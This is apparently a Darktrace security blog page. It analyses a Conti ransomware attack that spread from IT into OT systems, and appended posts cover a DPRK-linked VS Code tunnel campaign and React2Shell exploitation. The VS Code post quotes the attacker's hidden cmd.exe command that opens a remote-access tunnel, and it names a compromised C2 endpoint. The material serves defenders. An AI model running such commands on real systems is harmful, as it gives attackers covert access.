Blog
/
OT
/
February 9, 2022

The Impact of Conti Ransomware on OT Systems

Learn how ransomware can spread throughout converged IT/OT environments, and how Self-Learning AI empowers organizations to contain these threats.
Written by
Oakley Cox
Director of Product
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Oakley Cox
Director of Product
Default blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog imageDefault blog image
09
Feb 2022

Ransomware has taken the world by storm, and IT is not the only technology affected. Operational Technology (OT), which is increasingly blending with IT, is also susceptible to ransomware tactics, techniques, and procedures (TTPs). And when ransomware strikes OT, the effects have the potential to be devastating.

Here, we will look at a ransomware attack that spread from IT to OT systems. The attack was detected by Darktrace AI.

This threat find demonstrates a use case of Darktrace’s technology that delivers immense value to organizations with OT: spotting and stopping ransomware at its earliest stages, before the damage is done. This is particularly helpful for organizations with interconnected enterprise and industrial environments, as it means:

  1. Emerging attacks can be contained in IT before they spread laterally into OT, and even before they spread from device to device in IT;
  2. Organizations gain granular visibility into their industrial environments, detecting deviations from normal activity, and quick identification of remediating actions.

Threat find: Ransomware and crypto-mining hijack affecting IT and OT systems

Darktrace recently identified an aggressive attack targeting an OT R&D investment firm in EMEA. The attack originally started as a crypto-mining campaign and later evolved into ransomware. This organization deployed Darktrace in a digital estate containing both IT and OT assets that spanned over 3,000 devices.

If the organization had deployed Darktrace’s Autonomous Response technology in active mode, this threat would have been stopped in its earliest stages. Even in the absence of Autonomous Response, however, mere human attention would have stopped this attack’s progression. Darktrace’s Self-Learning AI gave clear indications of an ongoing compromise in the month prior to the detonation of ransomware. In this case, however, the security team was not monitoring Darktrace’s interface, and so the attack was allowed to proceed.

Compromised OT devices

This threat find will focus on the attack techniques used to take over two OT devices, specifically, a HMI (human machine interface), and an ICS Historian used to collect and log industrial data. These OT devices were both VMware virtual machines running Windows OS, and were compromised as part of a wider Conti ransomware infection. Both devices were being used primarily within an industrial control system (ICS), running a popular ICS software package and making regular connections to an industrial cloud platform.

These devices were thus part of an ICSaaS (ICS-as-a-Service) environment, using virtualised and Cloud platforms to run analytics, update threat intelligence, and control the industrial process. As previously highlighted by Darktrace, the convergence of cloud and ICS increases a network’s attack surface and amplifies cyber risk.

Attack lifecycle

Opening stages

The initial infection of the OT devices occurred when a compromised Domain Controller (DC) made unusual Active Directory requests. The devices made subsequent DCE-RPC binds for epmapper, often used by attackers for command execution, and lsarpc, used by attackers to abuse authentication policies and escalate privileges.

The payload was delivered when the OT devices used SMB to connect to the sysvol folder on the DC and read a malicious executable file, called SetupPrep.exe.

Figure 1: Darktrace model breaches across the whole network from initial infection on October 21 to the detonation on November 15.

Figure 2: ICS reads on the HMI in the lead up, during, and following detonation of the ransomware.

Device encryption and lateral spread

The malicious payload remained dormant on the OT devices for three weeks. It seems the attacker used the time to install crypto-mining malware elsewhere on the network and consolidate their foothold.

On the day the ransomware detonated, the attacker used remote management tools to initiate encryption. The PSEXEC tool was used on an infected server (separate from the original DC) to remotely execute malicious .dll files on the compromised OT devices.

The devices then attempted to make command and control (C2) connections to rare external endpoints using suspicious ports. Like in many ICS networks, sufficient network segregation had been implemented to prevent the HMI device from making successful connections to the Internet and the C2 communications failed. But worryingly, the failed C2 did not prevent the attack from proceeding or the ransomware from detonating.

The Historian device made successful C2 connections to around 40 unique external endpoints. Darktrace detected beaconing-type behavior over suspicious TCP/SSL ports including 465, 995, 2078, and 2222. The connections were made to rare destination IP addresses that did not specify the Server Name Indication (SNI) extension hostname and used self-signed and/or expired SSL certificates.

Both devices enumerated network SMB shares and wrote suspicious shell scripts to network servers. Finally, the devices used SMB to encrypt files stored in network shares, adding a file extension which is likely to be unique to this victim and which will be called ABCXX for the purpose of this blog. Most encrypted files were uploaded to the folder in which the file was originally located, but in some instances were moved to the images folder.

During the encryption, the device was using the machine account to authenticate SMB sessions. This is in contrast to other ransomware incidents that Darktrace has observed, in which admin or service accounts are compromised and abused by the attacker. It is possible that in this instance the attacker was able to use ‘Living off the Land’ techniques (for example the use of lsarpc pipe) to give the machine account admin privileges.

Examples of files being encrypted and moved:

  • SMB move success
  • File: new\spbr0007\0000006A.bak
  • Renamed: new\spbr0007\0000006A.bak.ABCXX
  • SMB move success
  • File: ActiveMQ\readme.txt
  • Renamed: Images\10j0076kS1UA8U975GC2e6IY.488431411265952821382.png.ABCXX

Detonation of ransomware

Upon detonation, the ransomware note readme.txt was written by the ICS to targeted devices as part of the encryption activity.

The final model breached by the device was “Unresponsive ICS Device” as the device either stopped working due to the effects of the ransomware, or was removed from the network.

Figure 3: abc-histdev — external connections filtered on destination port 995 shows C2 connections starting around one hour before encryption began.

How the attack bypassed the rest of the security stack

In this threat find, there were a number of factors which resulted in the OT devices becoming compromised.

The first is IT/OT convergence. The ICS network was insufficiently segregated from the corporate network. This means that devices could be accessed by the compromised DC during the lateral movement stage of the attack. As OT becomes more reliant on IT, ensuring sufficient segregation is in place, or that an attacker can not circumvent such segregation, is becoming an ever increasing challenge for security teams.

Another reason is that the attacker used attack methods which leverage Living off the Land techniques to compromise devices with no discrimination as to whether they were part of an IT or OT network. Many of the machines used to operate ICS networks, including the devices highlighted here, rely on operating systems vulnerable to the kinds of TTPs observed here and that are regularly employed by ransomware groups.

Darktrace insights

Darktrace’s Cyber AI Analyst was able to stitch together many disparate forms of unusual activity across the compromised devices to give a clear security narrative containing details of the attack. The incident report for the Historian server is shown below. This provides a clear illustration of how Cyber AI Analyst can close any skills or communication gap between IT and OT specialists.

Figure 4: Cyber AI Analyst of the Historian server (abc-histdev). It investigated and reported the C2 communication (step 2) that started just before network reconnaissance using TCP scanning (step 3) and the subsequent file encryption over SMB (step 4).

In total, the attacker’s dwell time within the digital estate was 25 days. Unfortunately, it lead to disruption to operational technology, file encryption and financial loss. Altogether, 36 devices were crypto-mining for over 20 days – followed by nearly 100 devices (IT and OT) becoming encrypted following the detonation of the ransomware.

If it were active, Autonomous Response would have neutralized this activity, containing the damage before it could escalate into crisis. Darktrace’s Self-Learning AI gave clear indications of an ongoing compromise in the month prior to the detonation of ransomware, and so any degree of human attention toward Darktrace’s revelations would have stopped the attack.

Autonomous Response is highly configurable, and so, in industrial environments — whether air-gapped OT or converged IT/OT ecosystems — Antigena can be deployed in a variety of manners. In human confirmation mode, human operators need to give the green light before the AI takes action. Antigena can also be deployed only in the higher levels of the Purdue model, or the “IT in OT,” protecting the core assets from fast-moving attacks like ransomware.

Ransomware and interconnected IT/OT systems

ICS networks are often operated by machines that rely on operating systems which can be affected by TTPs regularly employed by ransomware groups — that is, TTPs such as Living off the Land, which do not discriminate between IT and OT.

The threat that ransomware poses to organizations with OT, including critical infrastructure, is so severe that the Cyber Infrastructure and Security Agency (CISA) released a fact sheet concerning these threats in the summer of 2021, noting the risk that IT attacks pose to OT networks:

“OT components are often connected to information technology (IT) networks, providing a path for cyber actors to pivot from IT to OT networks… As demonstrated by recent cyber incidents, intrusions affecting IT networks can also affect critical operational processes even if the intrusion does not directly impact an OT network.”

Major ransomware attacks against the Colonial Pipeline and JBS Foods demonstrate the potential for ransomware affecting OT to cause severe economic disruption on a national and international scale. And ransomware can wreak havoc on OT systems regardless of whether they directly target OT systems.

As industrial environments continue to converge and evolve — be they IT/OT, ICSaaS, or simply poorly segregated legacy systems — Darktrace stands ready to contain attacks before the damage is done. It is time for organizations with industrial environments to take the quantum leap forward that Darktrace’s Self-Learning AI is uniquely positioned to provide.

Thanks to Darktrace analysts Ash Brice and Andras Balogh for their insights on the above threat find.

Discover more on how Darktrace protects OT environments from ransomware

Darktrace model detections

HMI in chronological order at time of detonation:

  • Anomalous Connection / SMB Enumeration
  • Anomalous File / Internal / Unusual SMB Script Write
  • Anomalous File / Internal / Additional Extension Appended to SMB File
  • Compromise / Ransomware / Suspicious SMB Activity [Enhanced Monitoring]
  • ICS / Unusual Data Transfer By OT Device
  • ICS / Unusual Unresponsive ICS Device

Historian

  • ICS / Rare External from OT Device
  • Anomalous Connection / Anomalous SSL without SNI to New External
  • Anomalous Connection / Multiple Connections to New External TCP Port
  • ICS / Unusual Activity From OT Device
  • Anomalous Connection / SMB Enumeration
  • Anomalous Connection / Suspicious Activity On High Risk Device
  • Unusual Activity / SMB Access Failures
  • Device / Large Number of Model Breaches
  • ICS / Unusual Data Transfer By OT Device
  • Anomalous File / Internal / Additional Extension Appended to SMB File
  • Device / SMB Lateral Movement
  • Compromise / Ransomware / Suspicious SMB Activity [Enhanced Monitoring]
  • Device / Multiple Lateral Movement Model Breaches [Enhanced Monitoring]

Written by
Oakley Cox
Director of Product
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Oakley Cox
Director of Product

Darktrace Identifies Campaign Targeting South Korea Leveraging VS Code for Remote Access

Network
January 21, 2026
Watch the NIS2 Webinar
Trending blogs
1
Securing Generative AI: Managing Risk in Amazon Bedrock with Darktrace / CLOUD
Nov 19, 2025
2
How Empowering End Users can Improve Your Email Security and Decrease the Burden on the SOC
May 8, 2024
3
Elevating Network Security: Confronting Trust, Ransomware, & Novel Attacks
Jun 21, 2024
4
The State of AI in Cybersecurity: Unveiling Global Insights from 1,800 Security Practitioners
Apr 9, 2024
5
The State of AI in Cybersecurity: The Impact of AI on Cybersecurity Solutions
May 13, 2024

More in this series

No items found.
Continue reading
OT
November 20, 2025

Managing OT Remote Access with Zero Trust Control & AI Driven Detection

A forward-looking breakdown of why modern OT environments can’t rely on visibility alone, and how combining Zero Trust access control with AI-driven behavioral detection gives industrial organizations real-time oversight, accountability, and secure remote access without disrupting operations.
Pallavi Singh
Product Marketing Manager, OT Security & Compliance
Read more
OT
September 30, 2025

Redefining OT security with dedicated OT workflows & NEXT-gen visibility for industrial teams

The latest release of Darktrace / OT brings powerful new innovations to security teams defending industrial infrastructure. With a dedicated OT dashboard, segmentation-aware risk modeling, and expanded visibility into edge assets and automation protocols, Darktrace / OT empowers engineers and defenders with the context and control they need to protect today’s converged environments, from IT to the industrial edge.
Pallavi Singh
Product Marketing Manager, OT Security & Compliance
Read more
OT
September 4, 2025

Rethinking Signature-Based Detection for Power Utility Cybersecurity

Signature-based detection has been a mainstay of IT security for decades, but the unique realities of operational technology (OT) environments make it a poor return on investment for power utilities. While signatures can still provide value for commodity IT malware, they fail against insider misuse, zero-day exploits, and custom-built malware designed for grid operations. Historical evidence shows signatures rarely generalize across different utilities, and overreliance creates strategic blind spots. To effectively defend critical energy infrastructure, utilities should prioritize behavioral analytics, anomaly detection, and intelligence sharing across the community.
Daniel Simonds
Director of Operational Technology
Read more

Blog

/

Network

/

January 22, 2026

Darktrace Identifies Campaign Targeting South Korea Leveraging VS Code for Remote Access

campaign targeting south orea leveraging vs code for remote accessDefault blog imageDefault blog image

Introduction

Darktrace analysts recently identified a campaign aligned with Democratic People’s Republic of Korea (DPRK) activity that targets users in South Korea, leveraging Javascript Encoded (JSE) scripts and government-themed decoy documents to deploy a Visual Studio Code (VS Code) tunnel to establish remote access.

Technical analysis

Decoy document with title “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026”.
Figure 1: Decoy document with title “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026”.

The sample observed in this campaign is a JSE file disguised as a Hangul Word Processor (HWPX) document, likely sent to targets via a spear-phishing email. The JSE file contains multiple Base64-encoded blobs and is executed by Windows Script Host. The HWPX file is titled “Documents related to selection of students for the domestic graduate school master's night program in the first half of 2026 (1)” in C:\ProgramData and is opened as a decoy. The Hangul documents impersonate the Ministry of Personnel Management, a South Korean government agency responsible for managing the civil service. Based on the metadata within the documents, the threat actors appear to have taken the documents from the government’s website and edited them to appear legitimate.

Base64 encoded blob.
Figure 2: Base64 encoded blob.

The script then downloads the VSCode CLI ZIP archives from Microsoft into C:\ProgramData, along with code.exe (the legitimate VS Code executable) and a file named out.txt.

In a hidden window, the command cmd.exe /c echo | "C:\ProgramData\code.exe" tunnel --name bizeugene > "C:\ProgramData\out.txt" 2>&1 is run, establishinga VS Code tunnel named “bizeugene”.

VSCode Tunnel setup.
Figure 3: VSCode Tunnel setup.

VS Code tunnels allows users connect to a remote computer and use Visual Studio Code. The remote computer runs a VS Code server that creates an encrypted connection to Microsoft’s tunnel service. A user can then connect to that machine from another device using the VS Code application or a web browser after signing in with GitHub or Microsoft. Abuse of VS Code tunnels was first identified in 2023 and has since been used by Chinese Advance Persistent Threat (APT) groups targeting digital infrastructure and government entities in Southeast Asia [1].

Contents of out.txt.
Figure 4: Contents of out.txt.

The file “out.txt” contains VS Code Server logs along with a generated GitHub device code. Once the threat actor authorizes the tunnel from their GitHub account, the compromised system is connected via VS Code. This allows the threat actor to have interactive access over the system, with access to the VS Code’s terminal and file browser, enabling them to retrieve payloads and exfiltrate data.

GitHub screenshot after connection is authorized.
Figure 5: GitHub screenshot after connection is authorized.

This code, along with the tunnel token “bizeugene”, is sent in a POST request to https://www.yespp.co.kr/common/include/code/out.php, a legitimate South Korean site that has been compromised is now used as a command-and-control (C2) server.

Conclusion

The use of Hancom document formats, DPRK government impersonation, prolonged remote access, and the victim targeting observed in this campaign are consistent with operational patterns previously attributed to DPRK-aligned threat actors. While definitive attribution cannot be made based on this sample alone, the alignment with established DPRK tactics, techniques, and procedures (TTPs) increases confidence that this activity originates from a DPRK state-aligned threat actor.

This activity shows how threat actors can use legitimate software rather than custom malware to maintain access to compromised systems. By using VS Code tunnels, attackers are able to communicate through trusted Microsoft infrastructure instead of dedicated C2 servers. The use of widely trusted applications makes detection more difficult, particularly in environments where developer tools are commonly installed. Traditional security controls that focus on blocking known malware may not identify this type of activity, as the tools themselves are not inherently malicious and are often signed by legitimate vendors.

Credit to Tara Gould (Malware Research Lead)
Edited by Ryan Traill (Analyst Content Lead)

Appendix

Indicators of Compromise (IoCs)

115.68.110.73 - compromised site IP

9fe43e08c8f446554340f972dac8a68c - 2026년 상반기 국내대학원 석사야간과정 위탁교육생 선발관련 서류 (1).hwpx.jse

MITRE ATTACK

T1566.001 - Phishing: Attachment

T1059 - Command and Scripting Interpreter

T1204.002 - User Execution

T1027 - Obfuscated Files and Information

T1218 - Signed Binary Proxy Execution

T1105 - Ingress Tool Transfer

T1090 - Proxy

T1041 - Exfiltration Over C2 Channel

References

[1]  https://unit42.paloaltonetworks.com/stately-taurus-abuses-vscode-southeast-asian-espionage/

Continue reading
About the author

Blog

/

/

January 19, 2026

React2Shell Reflections: Cloud Insights, Finance Sector Impacts, and How Threat Actors Moved So Quickly

React2Shell Default blog imageDefault blog image

Introduction

Last month’s disclosure of CVE 2025-55812, known as React2Shell, provided a reminder of how quickly modern threat actors can operationalize newly disclosed vulnerabilities, particularly in cloud-hosted environments.

The vulnerability was discovered on December 3, 2025, with a patch made available on the same day. Within 30 hours of the patch, a publicly available proof-of-concept emerged that could be used to exploit any vulnerable server. This short timeline meant many systems remained unpatched when attackers began actively exploiting the vulnerability.  

Darktrace researchers rapidly deployed a new honeypot to monitor exploitation of CVE 2025-55812 in the wild.

Within two minutes of deployment, Darktrace observed opportunistic attackers exploiting this unauthenticated remote code execution flaw in React Server Components, leveraging a single crafted request to gain control of exposed Next.js servers. Exploitation quickly progressed from reconnaissance to scripted payload delivery, HTTP beaconing, and cryptomining, underscoring how automation and pre‑positioned infrastructure by threat actors now compress the window between disclosure and active exploitation to mere hours.

For cloud‑native organizations, particularly those in the financial sector, where Darktrace observed the greatest impact, React2Shell highlights the growing disconnect between patch availability and attacker timelines, increasing the likelihood that even short delays in remediation can result in real‑world compromise.

Cloud insights

In contrast to traditional enterprise networks built around layered controls, cloud architectures are often intentionally internet-accessible by default. When vulnerabilities emerge in common application frameworks such as React and Next.js, attackers face minimal friction.  No phishing campaign, no credential theft, and no lateral movement are required; only an exposed service and exploitable condition.

The activity Darktrace observed during the React2shell intrusions reflects techniques that are familiar yet highly effective in cloud-based attacks. Attackers quickly pivot from an exposed internet-facing application to abusing the underlying cloud infrastructure, using automated exploitation to deploy secondary payloads at scale and ultimately act on their objectives, whether monetizing access through cryptomining or to burying themselves deeper in the environment for sustained persistence.

Cloud Case Study

In one incident, opportunistic attackers rapidly exploited an internet-facing Azure virtual machine (VM) running a Next.js application, abusing the React/next.js vulnerability to gain remote command execution within hours of the service becoming exposed. The compromise resulted in the staged deployment of a Go-based remote access trojan (RAT), followed by a series of cryptomining payloads such as XMrig.

Initial Access

Initial access appears to have originated from abused virtual private network (VPN) infrastructure, with the source IP (146.70.192[.]180) later identified as being associated with Surfshark

The IP address above is associated with VPN abuse leveraged for initial exploitation via Surfshark infrastructure.
Figure 1: The IP address above is associated with VPN abuse leveraged for initial exploitation via Surfshark infrastructure.

The use of commercial VPN exit nodes reflects a wider trend of opportunistic attackers leveraging low‑cost infrastructure to gain rapid, anonymous access.

Parent process telemetry later confirmed execution originated from the Next.js server, strongly indicating application-layer compromise rather than SSH brute force, misused credentials, or management-plane abuse.

Payload execution

Shortly after successful exploitation, Darktrace identified a suspicious file and subsequent execution. One of the first payloads retrieved was a binary masquerading as “vim”, a naming convention commonly used to evade casual inspection in Linux environments. This directly ties the payload execution to the compromised Next.js application process, reinforcing the hypothesis of exploit-driven access.

Command-and-Control (C2)

Network flow logs revealed outbound connections back to the same external IP involved in the inbound activity. From a defensive perspective, this pattern is significant as web servers typically receive inbound requests, and any persistent outbound callbacks — especially to the same IP — indicate likely post-exploitation control. In this case, a C2 detection model alert was raised approximately 90 minutes after the first indicators, reflecting the time required for sufficient behavioral evidence to confirm beaconing rather than benign application traffic.

Cryptominers deployment and re-exploitation

Following successful command execution within the compromised Next.js workload, the attackers rapidly transitioned to monetization by deploying cryptomining payloads. Microsoft Defender observed a shell command designed to fetch and execute a binary named “x” via either curl or wget, ensuring successful delivery regardless of which tooling was availability on the Azure VM.

The binary was written to /home/wasiluser/dashboard/x and subsequently executed, with open-source intelligence (OSINT) enrichment strongly suggesting it was a cryptominer consistent with XMRig‑style tooling. Later the same day, additional activity revealed the host downloading a static XMRig binary directly from GitHub and placing it in a hidden cache directory (/home/wasiluser/.cache/.sys/).

The use of trusted infrastructure and legitimate open‑source tooling indicates an opportunistic approach focused on reliability and speed. The repeated deployment of cryptominers strongly suggests re‑exploitation of the same vulnerable web application rather than reliance on traditional persistence mechanisms. This behavior is characteristic of cloud‑focused attacks, where publicly exposed workloads can be repeatedly compromised at scale more easily.

Financial sector spotlight

During the mass exploitation of React2Shell, Darktrace observed targeting by likely North Korean affiliated actors focused on financial organizations in the United Kingdom, Sweden, Spain, Portugal, Nigeria, Kenya, Qatar, and Chile.

The targeting of the financial sector is not unexpected, but the emergence of new Democratic People’s Republic of Korea (DPRK) tooling, including a Beavertail variant and EtherRat, a previously undocumented Linux implant, highlights the need for updated rules and signatures for organizations that rely on them.

EtherRAT uses Ethereum smart contracts for C2 resolution, polling every 500 milliseconds and employing five persistence mechanisms. It downloads its own Node.js runtime from nodejs[.]org and queries nine Ethereum RPC endpoints in parallel, selecting the majority response to determine its C2 URL. EtherRAT also overlaps with the Contagious Interview campaign, which has targeted blockchain developers since early 2025.

Read more finance‑sector insights in Darktrace’s white paper, The State of Cyber Security in the Finance Sector.

Threat actor behavior and speed

Darktrace’s honeypot was exploited just two minutes after coming online, demonstrating how automated scanning, pre-positioned infrastructure and staging, and C2 infrastructure traced back to “bulletproof” hosting reflects a mature, well‑resourced operational chain.

For financial organizations, particularly those operating cloud‑native platforms, digital asset services, or internet‑facing APIs, this activity demonstrates how rapidly geopolitical threat actors can weaponize newly disclosed vulnerabilities, turning short patching delays into strategic opportunities for long‑term access and financial gain. This underscores the need for a behavioral-anomaly-led security posture.

Credit to Nathaniel Jones (VP, Security & AI Strategy, Field CISO) and Mark Turner (Specialist Security Researcher)

Edited by Ryan Traill (Analyst Content Lead)

Appendices

Indicators of Compromise (IoCs)

146.70.192[.]180 – IP Address – Endpoint Associated with Surfshark

References

https://www.darktrace.com/resources/the-state-of-cybersecurity-in-the-finance-sector

Continue reading
About the author
Nathaniel Jones
VP, Security & AI Strategy, Field CISO
Your data. Our AI.
Elevate your network security with Darktrace AI